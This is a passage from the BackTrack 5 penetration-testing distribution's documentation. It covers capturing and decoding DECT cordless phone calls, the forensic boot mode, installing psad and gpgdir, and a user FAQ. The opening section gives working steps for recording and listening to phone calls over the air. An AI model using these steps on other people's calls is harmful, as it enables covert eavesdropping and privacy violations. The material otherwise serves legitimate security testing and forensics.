### starting autorec### stopping DIP### starting callscan### trying to sync on 00 82 ab b0 29### got sync### dumping to dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap### stopping DIP

After you hung up your phonecall the dumping should stop: 

Decode the call out of the datastream

Stop the autorec:

stop

Decode the audiostream out of the raw dump

root@bt:~# ./decode.sh

Import the streams into audacity and listen to the calls

Start audacity via "alt + f2" then type “audacity” and press enter. Import the fixed-part and

hte portable-part .wav files from /pentest/telephony/dedected/com-on-air_cs-linux/tools via

File -> Import -> Audio or simply "ctrl + shift + I" . Import the files which end

in .pcap_fp.ima.g721.wav and .pcap_pp.ima.g721.wav.

Play your phone call with the play button: 

 

Hint: if you can only hear noise your phone seems to use some encoding/encryption. You

can enable the repeater mode in your telephone so it disables encryption and you can test if

your setup is working properly.

Clean up / Reload

If you need to reload the drivers

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linuxroot@bt:~# make reload

If you’re finished and want to clean up:

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linuxroot@bt:~# make unloadroot@bt:~# rm /dev/coa

DECT protocol

If you are interested in more details of the protocol you can open the .pcap file in

Wireshark: 

 

Forensics Boot

Since BackTrack 4 and now BackTrack 5 you may have noticed that BackTrack has an

option BackTrack Forensics but what exactly is that ?

LiveCD and Forensics

For a long time now, Linux Live CDs have been very useful for forensic acquisition

purposes in instances where for one reason or another you can’t utilize a hardware write

blocker. When configured not to automount drives, and a little bit of know how, a Linux Live

CD can be a wonderful software write blocker. For a Linux live CD to be considered for this

purpose however, it is of the utmost importance that the use of the live CD in no way alters

any data in any manner. That's the main reason that BackTrack was rolled out in the past,

BackTrack would automount available drives and utilize swap partitions where available, by

doing this BackTrack could have caused all sorts of havoc, changing last mount times,

altering data on disk, and so on. But since BackTrack 4 and now BackTrack 5 that's not the

case anymore.

How?

So, lets have the scoop. Forensic people are often detail oriented and very conservative, so

how do we know it is safe to use? Well, first off the BackTrack 5 Live CD is based off of

Casper, and contains no filesystem automount scripts at all. The system initialization scripts

have been altered in the forensic boot mode so that BackTrack 5 will not look for or make

use of any swap partitions which are contained on the system. All those scripts have been

removed from the system.

Verification:

To test this functionality, we have tested this boot mode with multiple hardware

configurations. For each test, we took a before MD5 snapshot of the system disks, booted

BackTrack5 in forensic boot mode, verified no file systems were mounted and swap was not

in use, did a number of activities on the system, then shut the system back down and took

an after MD5 snapshot. In comparing the two MD5 snapshots, in every case they were a

match, demonstrating no changes on the disks has been made.

Usage:

When you utilize Backtrack for forensics purposes, be sure you don’t let it go through an

unattended boot. Default boot for Backtrack is standard boot mode, which will use swap

partitions if they are present. There is a nice long delay however, so you will have plenty of

time to select the proper boot mode. Also, please remember, this is a Linux distribution. It is

highly suggested that you become familiar with Linux before use this, or any other Linux

Live CD for any forensic purpose. Also, be sure to check out the additional forensic tools

added to Backtrack 5. We have concentrated on the addition of imaging and triage tools,

but if you find that one of your favorite utilities is not in place please let us know so we can

look into having it added.

psad: Intrusion Detection and Log Analysis with iptables

What is PSAD?

PSAD is a collection of three lightweight system daemons (two main daemons and one

helper daemon) that run on Linux machines and analyze #iptables log messages to detect

port scans and other suspicious traffic. A typical deployment is to run psad on the iptables

firewall where it #has #the fastest access to log data.

Installation Process:

Verify md5sum, and public key:

root@bt:~# cd /usr/local/srcroot@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5root@bt: /usr/local/src# wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.ascroot@bt: /usr/local/src# wget http://cipherdyne.org/public_keyroot@bt: /usr/local/src# md5sum -c psad-2.1.7.tar.bz2.md5psad-2.1.7.tar.bz2: OK

root@bt: /usr/local/src# gpg --import public_keyroot@bt: /usr/local/src# gpg --verify psad-2.1.7.tar.bz2.asc#gpg: Signature made Wed 14 Jul 2010 06:01:06 PM EDT using DSA key ID 0D3E7410#gpg: Good signature from "Michael Rash (Signing key for cipherdyne.org projects) <mbr@cipherdyne.org>"

Install PSAD:

root@bt: /usr/local/src# tar xfj psad-2.1.7.tar.bz2root@bt: /usr/local/src# cd psad-2.1.7root@bt: /usr/local/src/psad-2.1.7# ./install.pl

# Would you like to install the latest signatures from# http://www.cipherdyne.org/psad/signatures (y/n)? y

Start PSAD:

Notice you will get the following error:

root@bt:/usr/local/src/psad-2.1.7# /etc/init.d/psad startStarting psad: [*] Could not find mail, edit /etc/psad/psad.conf at /usr/sbin/psad line 9679.

To fix this we will need to edit psad.conf located in /etc/psad/ and add an email address as

follows:

root@bt:/usr/local/src/psad-2.1.7# vim /etc/psad/psad.conf

gpgdir - Recursive directory encryption with GnuPG

What is gpgdir?

gpgdir is a perl script that uses the CPAN GnuPG::Interface module to encrypt and decrypt

directories using a gpg key specified in ~/.gpgdirrc.

Installation Process:

Verify public key:

root@bt:~# cd /usr/local/src/root@bt: /usr/local/src# mkdir gpgdirroot@bt: /usr/local/src# cd gpgdir/root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc

root@bt: /usr/local/src/gpgdir# wget http://cipherdyne.org/public_keyroot@bt: /usr/local/src/gpgdir# gpg --import public_keyroot@bt: /usr/local/src/gpgdir# gpg --verify gpgdir-1.9.5.tar.bz2.asc

Install gpgdir:

root@bt: /usr/local/src/gpgdir# tar xfj gpgdir-1.9.5.tar.bz2root@bt: /usr/local/src/gpgdir# cd gpgdir-1.9.5root@bt: /usr/local/src/gpgdir/gpgdir-1.9.5# ./install.pl

Edit the config file to use the GnuPG default key:

root@bt: vim /usr/local/src/gpgdir

BackTrack Frequently Asked Questions

I’ve just installed BackTrack, what is the root password ?

The ubiquity installer uses the username "root" and “toor” password by default.

We also recommend you change this as soon as you have rebooted and verified everything

is working properly. You can do this by issuing the following command and following the

prompts.

passwd root

Why does my keyboard stop working when I try to type the password ?

It doesn't, your keyboard is still working.

When you type your password in BackTrack, nothing is shown on the screen. This is a

security measure to prevent someone from "shoulder surfing" and being able to see how

long your password is, thereby making it more difficult for someone who knows you to

guess your password.

How do I start the GUI environment ?

After booting from DVD/USB or after logging in on a HDD install, type the following

command

startx

Is BackTrack free for download?

Yes, and it always will be.

Do you offer a 64bit or gnome versions of BackTrack?

Yes we now offer 64bit and 32bit ISO's, as well as support for ARM based mobile devices.

Both 32bit and 64bit version come with either Gnome or KDE. You can also use Fluxbox as

your WM.

Which version should I download ?

We recommend that you download BackTrack 5. We no longer support any other versions.

I’ve just burned my iso and it will not boot ?

The 3 most common problems are the md5sum is wrong, the program you used to burn

the .iso file or cheap media. Please check these three things before asking for help.

I use Windows and I do not want to mess it up?

Backtrack can be run as a live dvd environment which will not affect your Windows install in

any way. If you run the installer and install to hard disk you are responsible for partitioning

your drive properly and selecting the correct drive or partition. Guides on installation

methods can be found on the Installation page.

Please remember that incorrect selections can completely wipe your hard drive and

potentially leave you without your original Windows/Linux installations !

Consider this as your only warning !

I’ve heard its stupid to run as root ?

Many of the tools in Backtrack need root access to run. Backtrack is a specialized

penetration testing distribution. We trust our users know the security risks of running as the

root user.

Whats the “perfect” laptop to run backtrack on?

Every one’s version of perfect is different. There is no perfect computer. Please check the

forums where users post their thoughts on models of computers.

Please remember to add yours to the list too

Where is the Backtrack manual ?

There is no manual. We do write official documentation on how to install Backtrack and how

to use some of the more exotic tools, however, we do not write guides on hacking in

general. We have aforum community and a wiki which both contain many user and dev

team submitted tutorials. Please also remember to check the manual section of

the website for more info on official documentation.

Do you offer any kind of official training ?

Check our Offensive Security Training website for the only official BackTrack Training.

Where can I find out more information about BackTrack ?

Keep updated with our blog, check our forums and check for BackTrack Fixes here.

Why cant I just add the Backtrack repositories to my Ubuntu install or the Ubuntu repositories to my Backtrack install ?

We highly recommend against this action because Backtrack tools are built with many

custom features, libraries and kernel. We have no way of knowing how they will perform on

a non Backtrack distribution, plus you will very quickly break your install.

Also if you chose to add the ubuntu repositories to your Backtrack install, you will most

certainly break your entire Backtrack install very quickly.

We do a lot of testing to ensure that all packages in our repo will work together without

causing problems.

If you decide on this course of action you do so entirely at your own risk and the backtrack

team will not offer any support in any way.

I want/need to rebuild the kernel, can you help me ?

Firstly it is very unlikely that you actually have a need to do this. Secondly if you need help

in rebuilding the kernel, then you probably shouldn't be doing it in the first place.

We do a lot of testing to ensure that all of the packages in our repo work with the kernel we

supply and by using your own kernel we have no way of knowing what compatibility will

break. We do not support this and will offer no help to those who choose to go ahead and

rebuild the kernel.

Sorry but if you still feel you want/need to rebuild the kernel for whatever reason, you are on

your own. We do not support this and will offer no help or answer questions from those who

choose to go ahead and rebuild the kernel.

Why don’t my network cards show up when I boot ?

BackTrack is a penetration testing distribution and as such DHCP requests etc entering the

network when you boot are usually very undesirable. You can easily enable networking by

issuing the following command:

/etc/init.d/networking start

Why cant BackTrack use wireless card “X” inside VMWare or Virtualbox ?

Any virtualisation software can only use USB wireless network cards as physical devices, all

other types of wireless card are seen as virtual ethernet devices and can only be seen as a

wireless device by the host and not by the guest operating system. So if you want to run

BackTrack in VMWare or Virtualbox and have full wireless capabilities, make sure you are

using a USB device.

Why don’t you provide a USB image like you did with previous versions ?

Previous versions required sometimes quite complicated methods to install to a USB stick,

so for convenience we provided special images for easy installation. With the latest editions

of BackTrack we have eliminated this need as it can easily be installed to a USB stick with

tools such as Unetbootin or via manual methods as described in the Installation section of

this site.

How do I contact you ?

To be honest, in the majority of cases you really don't need to.

Firstly consider this, we each get hundreds of emails and Private Messages both on

the forums and in our IRC channel every day. Almost all of these messages are from

people asking simple questions that are either covered in this wiki, FAQ or on

the forum itself. Almost every single one of those is a question that should be asked on

the forum as it is either covered there, or the question and it's subsequent answer would be

of benefit to the entire community rather than just the person asking it. Think of it this way, if

you are asking this question, wouldn't it make sense that somebody else may have the

same question or may have already asked it. The forum and wiki are valuable sources of

information, and that information is only as good as the questions asked and the answers

given.

Secondly, all of the team are volunteers, none of us are paid to work on the project and all

of us have lives, family, work etc etc outside of BackTrack. We all give our free time to the

project and the more of that which is taken up answering these questions is less time we

have to work on making BackTrack even better than it is.

So in short, if your question falls into the description above, then it's in your interest not to

email or send a Private Message. It will most likely just get ignored if it does fall into this

category.

However, if there is a something not covered by the above, then by all means do contact us.

You can find all of the dev team in our IRC channel (remember we don't live there all the

time), in the forums or contact details on the About page of the website.

Where is the IRC channel you are talking about ?

If you would like to join the community and contribute, visit us on irc.freenode.net, in

channel #backtrack-linux. Our website will continue to be the main source for all news and

updates regarding BackTrack. Be sure to see our channel rules read the channel topic and

remember that you need to be registered to speak.

Important: root ( *root*@* ) is banned by default on this channel, so please ensure you

configure your irc client appropriately.

I'm new to linux, is BackTrack a good place to start ?

Sorry, the simple answer to that is no.

BackTrack is a highly specialized distro, where a lot of normal tasks are not done

automatically for you as they are in a mainstream distro.

Our best advice if you wish to start off using linux with BackTrack as your first linux

operating system, is don't.

Start off by downloading a copy of Kubuntu (as it is a similar base operating system to

BackTrack) boot into that and force yourself to do everything you are used to doing on a

daily basis using that, preferably spending most of your time using the command line tools.

When and only when you can perform all of those daily tasks without having to look-up the

commands should you move to BackTrack.

Please don't take this as us saying you shouldn't use BackTrack, take it as friendly advice

that you are letting yourself in for a whole world of pain and frustration if you are not fully

comfortable performing administration of your own linux machine before you start with

Backtrack.

I have just downloaded and installed the latest version of Backtrack, do i still need to update ?

Although you have downloaded the latest release of the iso or VM, this does not mean you

will have the latest packages we provide. BackTrack is developed and updated on a

continual basis, and for this reason you should still update your installation at regular

intervals to keep yourself up to date with the latest packages, bugfixes and new tools.

When and how often do you update the BackTrack repo with new packages ?

Generally the BackTrack repo is updated with the weeks new packages late on a Sunday

night so that they are available to you on Monday morning.

There are times however when we feel that a package needs to be released straight away

rather than waiting until the next scheduled Sunday repo update. So in these cases the repo

update can happen at any time, day or night during the week.

Please note that while the repo is being sync'd, it will be unavailable for downloading

packages. This process doesn't take long so it will be rare for this to cause any of you more

than a very short period of unavailability.

How do I update Backtrack with the new packages ?

First make sure that you have an internet connection, then use the following commands

root@bt:~# apt-get updateroot@bt:~# apt-get upgrade

Optionally you can run

root@bt:~# apt-get updateroot@bt:~# apt-get dist-upgrade

Where can I find a complete list of all the tools installed in BackTrack ?

No such resource currently exists, however you can see a list of all packages installed on

your BackTrack system by running:

dpkg --list

Please remember that this will list all of the packages installed on BackTrack and not just

the tools

You can also search the repository for a particular package of interest by running the

following command:

apt-cache search <keyword of interest>